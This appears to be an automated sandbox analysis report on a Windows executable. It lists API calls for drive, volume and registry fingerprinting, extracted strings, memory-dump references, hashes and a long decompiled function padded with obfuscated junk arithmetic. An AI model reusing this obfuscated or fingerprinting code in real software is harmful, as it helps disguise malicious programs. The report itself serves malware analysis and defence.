0x0040aade
0x0040aae8
0x0040aaef
0x0040aaf6
0x0040aafd
0x0040ab04
0x0040ab0b
0x0040ab12
0x0040ab19
0x0040ab20
0x0040ab27
0x0040ab2e
0x0040ab34
0x0040ab3b
0x0040ab41
0x0040ab47
0x0040ab50
0x0040ab52
0x0040ab57
0x0040ab74
0x0040ab7b
0x0040abae
0x0040abb0
0x0040abbe
0x0040abbe
0x00000000
0x0040abbe
0x0040ab8d
0x0040abb8
0x00000000
0x0040abb8
0x0040ab97
0x0040ab9b
0x0040ab9c
0x0040aba0
0x0040aba6
0x0040abc4
0x0040abc4
0x0040abca
0x0040abd9
0x0040abe3
0x0040abe6
0x0040abf2
0x0040abf8
0x00000000
0x0040abf8

APIs

VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004,00000000,00000000,00000000), ref: 0040A508
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004,00000000,00000000,00000000), ref: 0040A547
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004,00000000,00000000,00000000), ref: 0040A585
wsprintfW.USER32 ref: 0040A7DB
wsprintfW.USER32 ref: 0040A837
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004,00000000,00000000,00000000), ref: 0040A854
VirtualFree.KERNEL32(?,00000000,00008000,80000001,00000000,00000000,?,00000040,00000000), ref: 0040A9C6
VirtualAlloc.KERNELBASE(00000000,0000008A,00003000,00000004,00000000,00000000,00000000), ref: 0040A9E4
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0040A9FE
wsprintfW.USER32 ref: 0040AB50
wsprintfW.USER32 ref: 0040AB97
wsprintfW.USER32 ref: 0040ABE3
VirtualFree.KERNELBASE(?,00000000,00008000,80000001,?,?,-0000000E,00000080,00000000), ref: 0040ABF2
VirtualAlloc.KERNELBASE(00000000,00000082,00003000,00000004,00000000,00000000,00000000), ref: 0040AC10
wsprintfW.USER32 ref: 0040B014
GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 0040B039
VirtualAlloc.KERNELBASE(00000000,00000040,00003000,00000004), ref: 0040B048
wsprintfW.USER32 ref: 0040B11C
lstrlenW.KERNEL32(2B24007A,?,?,?,?,00000000,00000000,00000000), ref: 0040BAB1

Part of subcall function 00409A23: VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,771F423D,00003000,?), ref: 00409A4C

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,00000000,00000000,00000000), ref: 0040B1A1
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0040B1B5

Part of subcall function 0040956C: GetVolumeInformationW.KERNELBASE(00000400,00000604,00000608,00000600,00000100,00000200,00000000,0040B218,?,0040B218,00000000,00000200,00000100,00000600,00000608,00000604), ref: 00409595

Part of subcall function 0040BACB: RegOpenKeyExW.KERNEL32(00000080,?,00000000,00020019,0040B486,7757BFA8,?,0040B486,80000002,?,00000000,?,00000080,00000000), ref: 0040BAEF
Part of subcall function 0040BACB: RegQueryValueExW.KERNEL32(0040B486,00000000,00000000,00000000,?,?,00000000,?,0040B486,80000002,?,00000000,?,00000080,00000000), ref: 0040BB1A

lstrlenW.KERNEL32(?,80000002,?,00000000,?,00000080,00000000), ref: 0040B48E
wsprintfW.USER32 ref: 0040B4C8
lstrlenW.KERNEL32(?), ref: 0040B538
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0040B581
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,?,?,?,?,00000000,00000000,00000000), ref: 0040B8D1

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetDriveTypeW.KERNELBASE(?,?,?,?,?,00000000,00000000,00000000), ref: 0040B937
GetDiskFreeSpaceW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9D3
lstrlenW.KERNEL32(2B24007A,?,00000000,?,00000000,?,00000000,?,00000000), ref: 0040BA25
wsprintfW.USER32 ref: 0040BA46
lstrlenW.KERNEL32(2B24007A,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040BA54
wsprintfW.USER32 ref: 0040BA6E

Strings

6y,, xrefs: 0040AF8A
G8, xrefs: 0040B746
=V, xrefs: 0040B438
"?C, xrefs: 0040AAC5
U, xrefs: 0040B5C7
E, xrefs: 0040B5BD
?:\, xrefs: 0040B8F8
;teS, xrefs: 0040B73C
bN|O, xrefs: 0040AE3D
Eay, xrefs: 0040A812
%I64u/, xrefs: 0040BA40
Az, xrefs: 0040B341
'cJ8, xrefs: 0040A615
3, xrefs: 0040A74D
]?, xrefs: 0040B7BE
r0TV, xrefs: 0040B647
se, xrefs: 0040A993
%F#, xrefs: 0040B2D3
*, xrefs: 0040A934
Nv., xrefs: 0040B093
%I64u, xrefs: 0040BA68
h>DI, xrefs: 0040B125
X#@9, xrefs: 0040A8DB
_kJi, xrefs: 0040AD37
o, xrefs: 0040B7F6
/e, xrefs: 0040A949, 0040A953
c, xrefs: 0040B81C
F], xrefs: 0040ACD4

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: Virtual$Alloc$wsprintf$lstrlen$Free$DiskDriveInfoInformationLibraryLoadNativeOpenQuerySpaceSystemTypeValueVolume
String ID: Nv.$"?C$%F#$%I64u$%I64u/$'cJ8$*$/e$3$;teS$?:\$Az$E$F]$G8$U$X#@9$]?$_kJi$bN|O$c$h>DI$o$r0TV$se$6y,$=V$Eay
API String ID: 3629219386-3388325073
Opcode ID: 3a97cc2b2d2470699cb6a3df6ad9e941216dd6283601918fc8486b6c3b5506ef
Instruction ID: dd140deddaae6280808349fb50ab78dea76c02182253c71ffba9836be27f815a
Opcode Fuzzy Hash: 3a97cc2b2d2470699cb6a3df6ad9e941216dd6283601918fc8486b6c3b5506ef
Instruction Fuzzy Hash: CAC222B09053689EDB20DFA18D85BDEBBB4FB04300F1081EAE559BB291D7745A81CF99

Uniqueness

Uniqueness Score: 100.00%

Function 004112E0, Relevance: 63.7, APIs: 33, Strings: 3, Instructions: 683
filewindowcomUNIQUE

Download Yara Rule

C-Code - Quality: 72%

			E004112E0(CHAR* __fp0, intOrPtr _a4) {
				char _v1048;
				void* _v1596;
				char _v1824;
				char _v1852;
				char _v2335;
				struct _NOTIFYICONDATAA _v2360;
				char _v2480;
				struct _BY_HANDLE_FILE_INFORMATION _v2504;
				intOrPtr _v2508;
				intOrPtr _v2516;
				void* _v2524;
				void* _v2528;
				void* _v2532;
				intOrPtr _v2536;
				char* _v2540;
				signed int _v2544;
				struct tagRECT _v2568;
				CHAR* _v2572;
				void* _v2576;
				void* _v2580;
				void* _v2584;
				void* _v2588;
				struct tagBITMAPINFO _v2592;
				signed int _v2596;
				long _v2600;
				signed int _v2604;
				void* _v2608;
				void* _v2612;
				void* _v2616;
				void* _v2620;
				signed int _v2624;
				char _v2625;
				char _v2628;
				char _v2629;
				struct HDC__* _v2632;
				signed int _v2636;
				void* _v2644;
				void* _v2652;
				signed int _v2656;
				signed int _v2660;
				void* _v2672;
				intOrPtr _v2676;
				struct HBITMAP__* _v2684;
				void* _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				intOrPtr _v2704;
				void* _v2716;
				struct HDC__* _v2736;
				struct HINSTANCE__* _v2852;
				char _v3232;
				struct tagPAINTSTRUCT _v3252;
				struct tWAVEFORMATEX _v3272;
				struct tagPOINT _v3288;
				struct tagPOINT _v3296;
				void* _v3312;
				char _v3316;
				signed int _v3320;
				signed int _v3324;
				char _v3328;
				struct HWAVEOUT__* _v3332;
				struct HWAVEOUT__* _v3336;
				char _v3337;
				struct _SECURITY_ATTRIBUTES* _v3340;
				long _v3344;
				signed int _v3345;
				struct tagPOINT _v3364;
				void* _v3368;
				struct tagPAINTSTRUCT _v3380;
				int _v3388;
				struct tagPOINT _v3400;
				int _v3404;
				int _v3408;
				signed int _v3412;
				int _v3416;
				signed int _v3428;
				int _v3432;
				void* _v3436;
				intOrPtr* _v3440;
				char _v3444;
				int _v3460;
				void* _v3464;
				void* _v3468;
				intOrPtr* _v3496;
				intOrPtr _v3500;
				char _v3504;
				signed int _v3516;
				struct HDC__* _v3520;
				intOrPtr _v3524;
				intOrPtr _v3556;
				char _v3588;
				char _v3656;
				char _v3676;
				signed int _v3692;
				char* _v3696;
				long _v3708;
				void* _v3716;
				void* _v3736;
				void* _v3740;
				int _v3744;
				char* _v3748;
				struct HWND__* _v3752;
				intOrPtr _v3756;
				void* _v3760;
				char _v3764;
				struct HWND__* _v3772;
				intOrPtr _v3776;
				int _v3780;
				signed int _v3788;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t470;
				signed int _t471;
				void** _t473;
				char _t477;
				struct HWND__* _t478;
				intOrPtr _t484;
				long _t486;
				struct HDC__* _t493;
				long _t497;
				long _t505;
				signed int _t506;
				long _t507;
				intOrPtr _t510;
				char _t513;
				char* _t515;
				signed int _t516;
				struct HWND__* _t517;
				int _t519;
				int _t523;
				signed int _t528;
				signed int _t533;
				intOrPtr _t536;
				signed int _t541;
				long _t560;
				signed int _t563;
				int _t565;
				int _t567;
				signed int _t568;
				signed int _t572;
				long _t573;
				signed int _t579;
				signed int _t583;
				long _t584;
				signed int _t585;
				long _t587;
				char _t591;
				struct HWAVEOUT__* _t592;
				long _t593;
				void* _t596;
				int _t601;
				intOrPtr _t613;
				long _t614;
				struct HDC__* _t615;
				signed int _t616;
				long _t617;
				long _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t629;
				long _t632;
				long _t633;
				intOrPtr* _t634;
				intOrPtr* _t638;
				long _t639;
				intOrPtr* _t642;
				long _t643;
				intOrPtr* _t648;
				int _t652;
				struct HWAVEOUT__* _t655;
				signed int _t660;
				struct HMONITOR__* _t671;
				struct HDC__* _t683;
				signed int _t684;
				void _t690;
				signed int _t697;
				signed int _t704;
				long _t710;
				signed short _t717;
				void* _t722;
				long _t724;
				struct HDC__* _t731;
				signed int _t732;
				signed int _t735;
				signed int _t736;
				signed int _t743;
				int _t751;
				signed int _t762;
				signed int _t765;
				char _t768;
				signed int* _t773;
				void** _t777;
				int _t784;
				char _t785;
				signed int _t788;
				signed int _t791;
				char _t793;
				long _t801;
				void* _t805;
				signed int _t827;
				signed int _t834;
				signed int _t835;
				void* _t838;
				void* _t844;
				long _t846;
				char _t857;
				long _t883;
				struct HWAVEOUT__* _t884;
				struct HWND__* _t885;
				int _t887;
				struct HWND__* _t889;
				long _t891;
				char _t893;
				signed int _t895;
				long _t897;
				signed int _t900;
				void* _t903;
				struct HWND__* _t913;
				signed int _t914;
				signed int _t917;
				intOrPtr _t920;
				int _t927;
				signed int _t932;
				signed int _t934;
				signed int _t938;
				long _t940;
				long _t946;
				long _t965;
				signed short _t967;
				void* _t977;
				long _t980;
				signed int _t981;
				intOrPtr _t997;
				signed int _t998;
				signed int _t1001;
				signed int _t1002;
				struct HWND__* _t1005;
				signed int _t1008;
				signed int _t1010;
				int _t1016;
				void* _t1017;
				signed int _t1018;
				char* _t1020;
				int _t1021;
				signed int _t1022;
				int _t1027;
				long _t1033;
				signed int _t1037;
				signed int _t1043;
				intOrPtr _t1044;
				void* _t1046;
				signed int _t1047;
				signed int _t1053;
				long _t1058;
				int _t1061;
				signed int _t1063;
				signed int _t1064;
				void* _t1067;
				void* _t1072;
				signed int _t1073;
				int _t1075;
				char _t1076;
				signed int _t1077;
				signed int _t1078;
				void* _t1080;
				struct HWAVEOUT__* _t1081;
				int _t1082;
				struct HDC__* _t1083;
				struct HWND__* _t1084;
				int _t1085;
				long _t1086;
				signed int _t1088;
				unsigned int _t1089;
				unsigned int _t1090;
				signed int _t1091;
				long _t1095;
				intOrPtr _t1097;
				void* _t1100;
				signed int _t1102;
				struct HWND__* _t1103;
				signed int _t1105;
				signed int _t1107;
				void* _t1108;
				long _t1109;
				signed int _t1110;
				int _t1111;
				int _t1113;
				char* _t1114;
				long _t1116;
				intOrPtr _t1117;
				struct HDC__* _t1118;
				struct HDC__* _t1121;
				int _t1122;
				struct HWND__* _t1123;
				void* _t1127;
				void* _t1130;
				long _t1132;
				signed int _t1133;
				intOrPtr _t1136;
				intOrPtr _t1138;
				struct HDC__* _t1143;
				signed int _t1145;
				void* _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1153;
				void* _t1154;
				struct HWND__* _t1155;
				long _t1158;
				void* _t1165;
				signed int _t1167;
				void* _t1169;
				void* _t1170;
				void* _t1171;
				void* _t1172;
				void* _t1173;
				void* _t1174;
				void* _t1176;
				void* _t1178;
				void* _t1179;
				void* _t1187;
				void* _t1192;
				void* _t1198;
				void* _t1200;
				void* _t1201;
				void* _t1202;
				void* _t1210;
				CHAR* _t1224;
				struct tagBITMAPINFOHEADER _t1225;

				_t1224 = __fp0;
				_t1153 = _t1167;
				_t1169 = (_t1167 & 0xffffffc0) - 0xa34;
				_t904 =  *0x44d1ec; // 0x9119dde3
				asm("xorps xmm0, xmm0");
				asm("movq [esp+0x6c], xmm0");
				 *0x44cb5c =  *0x44cb5c + 0xc838 - _t904 + _v2508;
				_push(_t883);
				_push(_t1072);
				_v2588 = 0;
				_v2504.ftCreationTime = 0;
				_t1187 =  *0x44ca4c - _t904; // 0x0
				if(_t1187 > 0) {
					asm("fldz");
					_v2636 = __fp0;
					E00420810(_t904);
					_t1169 = _t1169 - 8 + 8;
					_v2568.bottom = _t1224;
					asm("movsd xmm0, [esp+0x48]");
					_t1032 = 0x66666667 *  *0x44d374 >> 0x20 >> 1;
					_t904 = ((0xea0ea0eb *  *0x44d378 >> 0x20) +  *0x44d378 >> 5 >> 0x1f) + ((0xea0ea0eb *  *0x44d378 >> 0x20) +  *0x44d378 >> 5) - (0x66666667 *  *0x44d374 >> 0x20 >> 1 >> 0x1f) + (0x66666667 *  *0x44d374 >> 0x20 >> 1);
					asm("movd xmm1, ecx");
					asm("cvtdq2pd xmm1, xmm1");
					asm("addsd xmm0, xmm1");
					asm("mulsd xmm0, [0x437d20]");
					_v2588 = E004156C1((0x66666667 *  *0x44d374 >> 0x20 >> 1 >> 0x1f) + (0x66666667 *  *0x44d374 >> 0x20 >> 1));
				}
				_t470 = PathCommonPrefixA(0, 0, 0);
				 *0x44ca4c = _t470;
				_t14 =  &(_t470->i); // 0x3
				_t1105 = _t14;
				if(_t1105 != 0) {
					_t1072 = _v2568.top;
					_t883 = GetFileInformationByHandle;
					do {
						GetFileInformationByHandle(_t1072,  &_v2504); // executed
						_t1105 = _t1105 - 1;
						_t1190 = _t1105;
					} while (_t1105 != 0);
				}
				_t471 = PathCompactPathA(0, 0, 0);
				_v2600 = 0;
				_v2596 = 0;
				_v2592.bmiHeader = 0;
				 *0x44d374 = _t471 * _v2604;
				_v2588 = 0;
				_v2584 = 0;
				_t473 = E0041500C(_t1032, _t1190, 8);
				_t1170 = _t1169 + 4;
				if(_t473 == 0) {
					E0041A825(_t883, _t904, _t1032, __eflags);
					goto L66;
				} else {
					_v2600 = _t473;
					 *_t473 = 0;
					_t473[1] = 0;
					 *_v2600 =  &_v2600;
					E004132E0(_t883,  &_v2600, _t1032, _t1153, 0x44ca40);
					E004132E0(_t883,  &_v2604, _t1032, _t1153, 0x44ca40);
					_t1192 = ( *0x44d36c & 0x0000ffff) -  *0x44b630; // 0xd65634aa
					if(_t1192 <= 0) {
						 *0x44ca48 =  *0x44ca48 - ( *0x44c834 & 0x0000ffff);
					}
					E004132E0(_t883,  &_v2600, _t1032, _t1153, 0x44d364);
					_t29 =  &_v2588;
					 *_t29 = _v2588 - 1;
					if( *_t29 != 0) {
						_t32 =  &_v2588;
						 *_t32 = _v2588 + 1;
						__eflags =  *_t32;
					} else {
						_v2588 = 0;
					}
					if( *0x44d36c != 0 &&  *0x44d374 != 0) {
						MapViewOfFile(OpenFileMappingA(2, 0, _v2572), 2, 0, 0, 0);
					}
					E00413130(_t883,  &_v2600, _t1032, _t1153);
					L0041503F(_v2600);
					_t762 =  *0x44cdb4; // 0x0
					_t1178 = _t1170 + 4;
					_v2592.bmiColors = _t762;
					_t1133 = 2;
					_v2604 = 2;
					_v2580 = 2;
					_v2568.bottom = _t762 + 1;
					_t904 = GetDC(0);
					_v2576 = _t904;
					_v2544 = 0;
					if( *0x44ca40 > 0) {
						_t1100 = SelectObject;
						do {
							_t903 = CreateCompatibleDC(_t904);
							_t1008 =  *0x44cdb4; // 0x0
							 *0x44d364 =  *0x44d364 + _t1133 *  *0x44c830 - _v2604;
							 *0x44cb5c = 3 + _t1008 * 2; // executed
							_t834 = CreateFontA(0, 0, 0, 0, 0x190, 0, 0, 0, 0, 0, 0, 4, 0, 0x44cc68);
							_t1010 =  *0x44d364; // 0x76e
							_t835 = _t834 *  *0x44cdb4;
							_t1143 = _v2632;
							_v2660 = _t835;
							 *0x44b630 = _t1010 *  *0x44cb5c - _t835;
							 *0x44d1ec = _v2636 *  *0x44d364 + 0xa;
							SelectObject(_t1143, SelectObject(_t1143, 0));
							_t838 = SelectObject(_t903, 0);
							_t1032 =  *0x44d364; // 0x76e
							_t1145 = _t1032 *  *0x44ca4c;
							_t1016 =  *0x44d1ec; // 0x9119dde3
							_t1017 = _t1016 + _v2660;
							_v2652 = _t838;
							_v2620 = _t1145;
							_t1198 = _t1017 -  *0x44d378; // 0x1770020
							if(_t1198 > 0) {
								 *0x44d364 = _t1032;
							}
							asm("xorps xmm0, xmm0");
							asm("movups [esp+0x88], xmm0");
							_v2588 = _v2632;
							_v2584 = _v2636;
							asm("movq [esp+0xb8], xmm0");
							asm("movups [esp+0xac], xmm0");
							_v2592.bmiHeader = 0x28;
							_v2580 = 0x180001;
							_v2576 = 0;
							_v2572 = 0;
							_v2568.right = 0;
							_v2568.bottom = 0;
							_v2684 = CreateDIBSection(0,  &_v2592, 0,  &_v2616, 0, 0);
							_t844 = SelectObject(_t903, 0);
							_t1018 =  *0x44cdb4; // 0x0
							_v2644 = _t844;
							 *0x44cb5c = 3 + _t1018 * 2;
							_t1200 =  *0x44ca4c - _t1145; // 0x0
							if(_t1200 != 0) {
								L22:
								SetTextColor(_t903, 0xffffff);
								_t1020 = 0x44cb60;
								_t74 =  &(_t1020[1]); // 0x44cb61
								_t1032 = _t74;
								do {
									_t846 =  *_t1020;
									_t1020 =  &(_t1020[1]);
									__eflags = _t846;
								} while (_t846 != 0);
								_t1021 = _t1020 - _t1032;
								__eflags = _t1021;
								TextOutA(_t903, 0, 0, 0x44cb60, _t1021);
								_v2688 = 0;
							} else {
								_t1201 = _v2716 -  *0x44d36c; // 0x0
								if(_t1201 != 0) {
									goto L22;
								} else {
									_t1202 = _v2692 -  *0x44d374; // 0x0
									if(_t1202 != 0) {
										goto L22;
									} else {
										_t1027 =  *0x44d1ec; // 0x9119dde3
										_t1151 =  *0x44d378; // 0x1770020
										_v2660 = _t1151;
										 *0x44b630 =  *0x44b630 + _v2652 + (_t1027 +  *0x44ca40) * 2 + _t1027 +  *0x44ca40;
										SetBkMode(_t903, 1);
									}
								}
							}
							if( *0x44d36c != 0) {
								_t1150 = 0;
								_t1102 = _v2696 * _v2692;
								if(_t1102 > 0) {
									_t1067 = _v2676 + 1;
									do {
										_t1022 =  *(_t1067 + 1) & 0x000000ff;
										_t1067 = _t1067 + 3;
										 *((intOrPtr*)(0x44cb60 + _t1150 * 4)) = ((_t1022 << 8) + ( *(_t1067 - 3) & 0x000000ff) << 8) + ( *(_t1067 - 4) & 0x000000ff);
										_t1150 = _t1150 + 1;
									} while (_t1150 < _t1102);
								}
								_t1100 = SelectObject;
							}
							if(_v2688 == 0) {
								E00417660(_t1100,  &_v2568, 0, 0x58);
								_t1178 = _t1178 + 0xc;
								_v2568.left = 0x58;
								_v2568.top = 0;
								_v2540 =  &_v2480;
								_v2480 = 0;
								_v2536 = 0x104;
								_v2568.bottom = 0x44cc68;
								_v2544 = 1;
								_v2532 = 0;
								_v2528 = 0;
								_v2524 = 0;
								_v2516 = 0x1800;
								GetOpenFileNameA( &_v2568);
							} else {
								_t857 =  *0x44ca40; // 0x770
								_t1149 = 0;
								_t1103 =  *0x44ca4c; // 0x0
								 *0x44cb60 = _t857;
								do {
									SendMessageA(_t1103, 0x102,  *(_t1178 + _t1149 + 0x134),  *0x44d1ec);
									_t1149 = _t1149 + 1;
								} while (_t1149 < 2);
								_t1100 = SelectObject;
								SelectObject(_t903, _v2672);
							}
							DeleteObject(0);
							SelectObject(_t903, _v2716);
							DeleteObject(0);
							DeleteObject(_t903);
							_t904 = _v2736;
							_t1210 = _v2704 + 1 -  *0x44ca40; // 0x770
							_v2704 = _v2704 + 1;
							_t1133 = _v2700;
						} while (_t1210 < 0);
					}
					_t765 =  *0x44d364; // 0x76e
					_t1072 = 0;
					 *0x44c834 = 2;
					_v2600 = 1;
					_t1105 = _t765 * 2 - 4 - _v2576 -  *0x44ca4c;
					 *0x44d364 = _t1105;
					E00417660(0,  &_v1824, 0, 0x100);
					asm("xorps xmm0, xmm0");
					_t1179 = _t1178 + 0xc;
					_t1211 =  *0x44d36c - 0x311;
					asm("movups [esp+0xc8], xmm0");
					asm("movq [esp+0xbc], xmm0");
					asm("movups [esp+0x74], xmm0");
					if( *0x44d36c == 0x311) {
						_t768 =  *0x44cdb4; // 0x0
						_v2360.szTip = _t768;
						E00417660(0,  &_v2335, 0, 0x103);
						_t1105 = _t1105 *  *0x44c830;
						_t897 =  *0x44d370; // 0x770
						_t883 = _t897 + 4 + _t1105 * 2;
						_t773 = E00411200();
						_t904 =  *_t773 | 0x00000001;
						__eflags =  *_t773 | 0x00000001;
						E0041F51D( *_t773 | 0x00000001, _t773[1],  &_v1048, 0x3ff,  &(_v2360.szTip), 0, _v2568.left);
						_t1179 = _t1179 + 0x28;
					} else {
						GetWindowDC(0);
						_t900 =  *0x44d364; // 0x76e
						_t883 = _t900 *  *0x44d36c *  *0x44c830 + 0x20000;
						GetWindowRect(0,  &_v2568);
					}
					_v2568.left = _t1072;
					L0041644E(); // executed
					_v2580 = _t1072;
					__imp__#421(0, 0,  &_v2580, 0, 0,  &_v2568);
					_v2620 = _t1072;
					_v2616 = _t1072;
					_v2612 = _t1072;
					_v2608 = _t1072;
					_v2604 = _t1072;
					_t777 = E0041500C(_t1032, _t1211, 8);
					_t1170 = _t1179 + 4;
					if(_t777 == 0) {
						L66:
						E0041A825(_t883, _t904, _t1032, __eflags);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t1171 = _t1170 - 0x2bc;
						 *0x44cb5c =  *0x44cb5c + 5;
						_push(_t883);
						_push(_t1153);
						_push(_t1105);
						_push(_t1072);
						_t1154 = CreateEventA(0, 0, 0, 0);
						_v3320 = _t1154;
						_t477 = GetProcessHeap();
						_t1073 =  *0x44d36c; // 0x0
						_t884 = 0;
						_v3328 = _t477;
						_t478 =  *0x44ca4c; // 0x0
						 *0x44cb5c =  *0x44cb5c + _t478 +  *0x44b630;
						_v3340 = 0;
						_v3296.x = 0;
						_v3296.y = 0;
						_v3288.x = 0;
						_v3288.y = 0;
						_v3312 = CreateEventA(0, 0, 0, "grot");
						GetCursorPos( &_v3296);
						_t200 =  &(_t884->i); // 0x1
						_t1033 = _t200;
						_t1075 = _t1073 *  *0x44d364 + 0xa;
						__eflags = _t1075;
						if(_t1075 != 0) {
							while(1) {
								asm("xorps xmm0, xmm0");
								_v3272.cbSize = 0;
								asm("movups [esp+0x58], xmm0");
								_v3272.wBitsPerSample = 8;
								_t1132 = 0;
								_v3272.wFormatTag = _t1033;
								_t1075 = _t1075 - 1;
								_v3344 = 0;
								_t1165 = 0;
								_v3272.nSamplesPerSec = 0x1f40;
								GetCursorPos( &_v3288);
								_v3272.nChannels = 1;
								_t717 = _v3272.wBitsPerSample >> 3;
								_v3272.nBlockAlign = _t717;
								_v3272.nAvgBytesPerSec = (_t717 & 0x0000ffff) * _v3272.nSamplesPerSec;
								__eflags = _v3296.x - _v3288.x;
								if(_v3296.x != _v3288.x) {
									goto L73;
								}
								__eflags = _v3296.y - _v3288.y;
								if(_v3296.y != _v3288.y) {
									goto L73;
								} else {
									_t743 =  *0x44cdb4; // 0x0
									_t981 =  *0x44c830; // 0x0
									 *0x44cb5c = 2;
									asm("cdq");
									_t751 =  *0x44d1ec; // 0x9119dde3
									 *0x44d1ec = _t751 + 0x1fb + (((_t743 << 4) -  *0x44cdb4 +  *0x44cb5c) *  *0x44b630 - _t1033 >> 1) +  *0x44b630 + (_t981 + _t981 * 4) * 2 +  *0x44d364;
									_t1132 = GetFileSize(0, 0);
								}
								L74:
								_t724 =  *0x44d370; // 0x770
								 *0x44d364 = _t724 -  *0x44c834 +  *0x44cdb4 +  *0x44ca4c;
								waveOutOpen( &_v3336, 0xffffffff,  &_v3272, _v3320, 0, 0x50000);
								__eflags = _t884;
								if(_t884 == 0) {
									_t731 = _v3364.x;
									goto L78;
								} else {
									_t1061 =  *0x44d1ec; // 0x9119dde3
									_t735 =  *0x44cdb4; // 0x0
									_t736 =  *0x44b630; // 0xd65634aa
									 *0x44b630 = _t736 + 3 + _t735 + _t1061 * 2 + _t1061;
									waveOutMessage(_v3364.y, _t1061, 2, 0);
									_t731 =  &(_v3380.hdc->i);
									__eflags =  *0x44cdb4;
									_v3380.hdc = _t731;
									if( *0x44cdb4 == 0) {
										L78:
										_t977 = _v3380.fRestore;
									} else {
										_t977 = HeapAlloc(_v3368, 8, 0x20);
										_t731 = _v3380.hdc;
										_v3380.rcPaint = _t977;
									}
								}
								__eflags = _t884 - 1;
								if(_t884 <= 1) {
									__eflags =  *0x44cdb4;
									if( *0x44cdb4 != 0) {
										 *((intOrPtr*)(_t977 + 4)) = _t1132;
									}
									__eflags = _t731 - 5;
									if(_t731 == 5) {
										_t732 =  *0x44cb5c; // 0x2
										_t241 = _t732 + 1; // 0x3
										_t980 = _t241 * _t732 +  *0x44c830;
										__eflags = _t980;
										 *0x44cb5c = _t980;
									} else {
										WaitForSingleObject(_v3336, 0xbb6);
										CloseHandle(_t1165);
										__eflags = _t1075;
										if(_t1075 != 0) {
											_t1033 = 1;
											continue;
										} else {
										}
									}
								}
								_t1154 = _v3344;
								goto L87;
								L73:
								_t1165 = CreateFileW(L"wav", 0x80000000, 1, 0, 3, 0x80, 0);
								_t722 = HeapAlloc(_v3328, 0, 0);
								_t884 =  &(_t884->i);
								__eflags = _t884;
								_v3296.x = _v3288.x;
								_v3296.y = _v3288.y;
								ReadFile(_t1165, _t722, 0,  &_v3344, 0);
								goto L74;
							}
						}
						L87:
						waveOutPrepareHeader(_v3336, 0, 0x20);
						__eflags =  *0x44d374;
						if( *0x44d374 != 0) {
							waveOutWrite(_v3380.rgbReserved.hdc, 0, 0x20);
						}
						_t484 =  *0x44ca44; // 0x76d
						 *0x44d364 = _t484 +  *0x44c830;
						_t486 =  *0x44cdb4; // 0x0
						__eflags = _t486;
						if(__eflags != 0) {
							WaitForSingleObject(_t1154, _t486);
						}
						waveOutClose(_v3380.rgbReserved.hdc);
						_t1107 =  *0x44ca54; // 0x1e0000
						_t1108 = _t1107 *  *0x44cdb4;
						asm("xorps xmm0, xmm0");
						asm("movq [esp+0x34], xmm0");
						asm("movq [esp+0x4c], xmm0");
						_t1036 = (0x88888889 *  *0x44c834 >> 0x20) +  *0x44c834 >> 4;
						_v3296.y = 0;
						_t912 = _t1036 + (_t1036 >> 0x1f) - _t1108 - (_v2656 & 0x000000ff) + ( *0x44c830 & 0x0000ffff) -  *0x44d378 -  *0x44d364;
						 *0x44cb5c = _t1036 + (_t1036 >> 0x1f) - _t1108 - (_v2656 & 0x000000ff) + ( *0x44c830 & 0x0000ffff) -  *0x44d378 -  *0x44d364;
						IsDlgButtonChecked( *0x44ca4c,  *0x44d1ec);
						_t493 =  *0x44ca54; // 0x1e0000
						 *0x44cdac = _t493;
						SetWindowTextA(GetDlgItem(0,  *0x44d364),  &_v3328);
						_v3272.nSamplesPerSec = 0;
						_v3272.nAvgBytesPerSec = 0;
						_v3272.nBlockAlign = 0;
						_v3272.cbSize = 0;
						_v3252.hdc = 0;
						_t497 = E0041500C(_t1036, __eflags, 8);
						_t1172 = _t1171 + 4;
						__eflags = _t497;
						if(__eflags == 0) {
							E0041A825(_t884, _t912, _t1036, __eflags);
							goto L179;
						} else {
							_v3272.nSamplesPerSec = _t497;
							 *_t497 = 0;
							 *(_t497 + 4) = 0;
							 *(_v3272.nSamplesPerSec) =  &(_v3272.nSamplesPerSec);
							E004132E0(_t884,  &(_v3272.nSamplesPerSec), _t1036, _t1154, 0x44d364);
							_t1044 =  *0x44ca48; // 0x0
							__eflags = 0x39 -  *0x44d378; // 0x1770020
							if(__eflags == 0) {
								_t710 = 0 -  *0x44cdb4 + _t1044 +  *0x44d1ec;
								__eflags = _t710;
								 *0x44cb5c = _t710;
							}
							_t932 =  *0x44ca40; // 0x770
							_t579 =  *0x44c834; // 0x2
							_v3364.y = 0;
							_t1158 = _t579 + _t932 * 2 + _t932;
							__eflags =  *0x44cdc4;
							_t1036 =  >=  ?  *0x44ca4c : _t1044;
							_v3312 = _t1158;
							 *0x44ca48 =  >=  ?  *0x44ca4c : _t1044;
